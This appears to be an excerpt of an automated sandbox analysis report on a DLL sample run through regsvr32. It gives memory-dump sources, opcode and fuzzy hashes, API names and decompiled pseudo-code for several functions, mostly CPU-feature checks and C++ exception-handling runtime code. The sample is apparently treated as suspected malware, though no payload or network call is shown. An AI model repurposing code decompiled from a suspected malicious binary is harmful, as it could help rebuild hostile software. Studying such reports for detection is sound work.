                                                                                                  • Instruction ID: 4c28c67afc2aa1cd3cf13127f126b6b27edcc9f7f6ebea0466276b8f7623da27
                                                                                                  • Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
                                                                                                  • Instruction Fuzzy Hash: C151A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619F865A6250D3B8D664CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E25450 Relevance: .1, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                  • Instruction ID: 8eabb498fc754d16319a850871542d78c1e2b89fc232946aca9b6be2a1ca5a21
                                                                                                  • Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
                                                                                                  • Instruction Fuzzy Hash: 44519DB490438E8FDB48CF68D88A5DF7BB1FB58348F004A19E825A6250D3B8D665CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E1CC84 Relevance: .1, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                  • Instruction ID: 420089a694c16bc050d0264cb98ec9adafe6d374381e4e4ffbb4ece628bec20a
                                                                                                  • Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
                                                                                                  • Instruction Fuzzy Hash: 3F41C3B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E0FFB8 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                  • Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
                                                                                                  • Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
                                                                                                  • Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E18E08 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                  • Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
                                                                                                  • Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
                                                                                                  • Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E14F18 Relevance: .1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                  • Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
                                                                                                  • Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
                                                                                                  • Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00E115C8 Relevance: .1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e01000_regsvr32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                  • Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
                                                                                                  • Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
                                                                                                  • Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800070A0 Relevance: .0, Instructions: 32COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 86%
                                                                                                  			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}







                                                                                                  0x1800070a0
                                                                                                  0x1800070a6
                                                                                                  0x1800070ab
                                                                                                  0x1800070b2
                                                                                                  0x1800070b2
                                                                                                  0x1800070b9
                                                                                                  0x1800070bb
                                                                                                  0x1800070c3
                                                                                                  0x1800070c9
                                                                                                  0x1800070cd
                                                                                                  0x1800070d3
                                                                                                  0x1800070d7
                                                                                                  0x1800070e1
                                                                                                  0x1800070eb
                                                                                                  0x1800070f6
                                                                                                  0x1800070fa
                                                                                                  0x180007101
                                                                                                  0x18000710f

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                  • Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
                                                                                                  • Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
                                                                                                  • Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GestureInfo$CloseHandle
                                                                                                  • String ID: 8
                                                                                                  • API String ID: 372500805-4194326291
                                                                                                  • Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                  • Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
                                                                                                  • Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
                                                                                                  • Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                  • String ID: i
                                                                                                  • API String ID: 3181456275-3865851505
                                                                                                  • Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                  • Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
                                                                                                  • Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
                                                                                                  • Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Object$LineMoveSelect$CreateDeletePolyline
                                                                                                  • String ID:
                                                                                                  • API String ID: 1917832262-0
                                                                                                  • Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                  • Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
                                                                                                  • Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
                                                                                                  • Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 66%
                                                                                                  			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0x5388a1408558
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

































                                                                                                  0x180003328
                                                                                                  0x180003335
                                                                                                  0x18000333a
                                                                                                  0x180003341
                                                                                                  0x180003348
                                                                                                  0x18000334b
                                                                                                  0x18000334f
                                                                                                  0x180003359
                                                                                                  0x180003363
                                                                                                  0x180003368
                                                                                                  0x18000336b
                                                                                                  0x180003376
                                                                                                  0x18000337d
                                                                                                  0x180003382
                                                                                                  0x180003385
                                                                                                  0x18000338a
                                                                                                  0x180003390
                                                                                                  0x180003399
                                                                                                  0x1800033a5
                                                                                                  0x1800033af
                                                                                                  0x1800033c0
                                                                                                  0x1800033cb
                                                                                                  0x1800033d1
                                                                                                  0x1800033db
                                                                                                  0x1800033e1
                                                                                                  0x1800033e6
                                                                                                  0x1800033ea
                                                                                                  0x1800033f3
                                                                                                  0x1800033fc
                                                                                                  0x180003401
                                                                                                  0x18000340c
                                                                                                  0x180003412
                                                                                                  0x18000341f
                                                                                                  0x180003426
                                                                                                  0x18000342c
                                                                                                  0x180003436
                                                                                                  0x180003438
                                                                                                  0x180003441
                                                                                                  0x18000344c
                                                                                                  0x180003458
                                                                                                  0x180003464
                                                                                                  0x18000346a
                                                                                                  0x180003478
                                                                                                  0x18000347c
                                                                                                  0x180003486
                                                                                                  0x180003490
                                                                                                  0x1800034a1
                                                                                                  0x1800034a7
                                                                                                  0x1800034ae
                                                                                                  0x1800034be
                                                                                                  0x1800034c9
                                                                                                  0x1800034ce
                                                                                                  0x1800034d1
                                                                                                  0x1800034d6
                                                                                                  0x1800034da
                                                                                                  0x1800034df
                                                                                                  0x1800034e4
                                                                                                  0x1800034eb
                                                                                                  0x1800034f1
                                                                                                  0x1800034f5
                                                                                                  0x1800034f9
                                                                                                  0x180003508
                                                                                                  0x180003517
                                                                                                  0x180003521
                                                                                                  0x180003524
                                                                                                  0x180003528
                                                                                                  0x18000352f
                                                                                                  0x180003539
                                                                                                  0x180003540
                                                                                                  0x180003546
                                                                                                  0x18000354c
                                                                                                  0x180003554
                                                                                                  0x180003558
                                                                                                  0x18000355f
                                                                                                  0x180003568
                                                                                                  0x18000356c
                                                                                                  0x180003570
                                                                                                  0x180003574
                                                                                                  0x180003578
                                                                                                  0x18000357b
                                                                                                  0x18000358c
                                                                                                  0x18000358f
                                                                                                  0x180003594
                                                                                                  0x1800035a1
                                                                                                  0x1800035a4
                                                                                                  0x1800035aa
                                                                                                  0x1800035ac
                                                                                                  0x1800035c7
                                                                                                  0x1800035d2
                                                                                                  0x1800035d8
                                                                                                  0x1800035de
                                                                                                  0x1800035e0
                                                                                                  0x1800035e6
                                                                                                  0x1800035e8
                                                                                                  0x1800035ee
                                                                                                  0x1800035f4
                                                                                                  0x180003612
                                                                                                  0x18000361a
                                                                                                  0x180003622
                                                                                                  0x18000362d
                                                                                                  0x180003635
                                                                                                  0x18000363e
                                                                                                  0x180003647
                                                                                                  0x18000364c
                                                                                                  0x180003651
                                                                                                  0x180003656
                                                                                                  0x18000365d
                                                                                                  0x180003668
                                                                                                  0x18000366b
                                                                                                  0x180003672
                                                                                                  0x180003684
                                                                                                  0x18000368a
                                                                                                  0x18000368e
                                                                                                  0x180003690
                                                                                                  0x18000369c
                                                                                                  0x1800036a6
                                                                                                  0x1800036b9
                                                                                                  0x1800036c7
                                                                                                  0x1800036d1
                                                                                                  0x1800036d3
                                                                                                  0x1800036db
                                                                                                  0x1800036e2
                                                                                                  0x1800036f1
                                                                                                  0x180003704
                                                                                                  0x180003709
                                                                                                  0x18000371a
                                                                                                  0x18000371e
                                                                                                  0x180003721
                                                                                                  0x180003726
                                                                                                  0x18000372b
                                                                                                  0x18000372f
                                                                                                  0x180003736
                                                                                                  0x18000373b
                                                                                                  0x180003740
                                                                                                  0x180003745
                                                                                                  0x18000374b
                                                                                                  0x180003754
                                                                                                  0x180003763
                                                                                                  0x18000376b
                                                                                                  0x180003772
                                                                                                  0x18000377a
                                                                                                  0x18000377f
                                                                                                  0x180003784
                                                                                                  0x18000378e
                                                                                                  0x1800037af

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                  • String ID: csm$csm$csm
                                                                                                  • API String ID: 849930591-393685449
                                                                                                  • Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
                                                                                                  • Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
                                                                                                  • Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
